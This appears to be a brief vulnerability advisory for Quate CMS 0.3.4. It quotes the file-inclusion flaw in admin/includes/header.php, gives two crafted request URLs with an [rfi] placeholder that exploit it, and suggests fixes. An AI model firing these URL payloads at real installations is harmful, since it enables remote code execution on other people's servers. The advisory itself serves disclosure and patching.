quate cms 0.3.4 lfi/rfi Multiple Vulnerabilities

###1.2 Remote and Local File Include ####1.2.1 漏洞分析 admin/includes/header.php ```php if ($bypass_installed != 1) { if (!is_file("../includes/installed")) { ... require("../includes/simple_gui.php"); exit(); } } if ($bypass_restrict != 1) { require_once($secure_page_path. "includes/secure.php"); } $admin_template_default = "default"; if ($not_logged_in != 1) { //echo $row_secure['account_theme']; if (file_exists("includes/themes/" .$row_secure['account_theme']. "/header.php")) { require_once("themes/" .$row_secure['account_theme']. "/header.php"); } else { require_once("themes/" .$admin_template_default. "/header.php"); } } else { require_once("themes/" .$admin_template_default. "/header.php"); } ``` ####1.2.2 漏洞利用 ``` http://[host]/admin/includes/header.php?bypass_installed=1&secure_page_path=[rfi]? http://[host]/admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=[rfi]? ``` ####1.2.3 漏洞修复 ```php 需要关闭远程包含 php.ini中设置allow_url_include为off if(@strstr($row_secure[account_theme],'..')){ exit(); } if(@strstr($secure_page_path,'..')){ exit(); } ```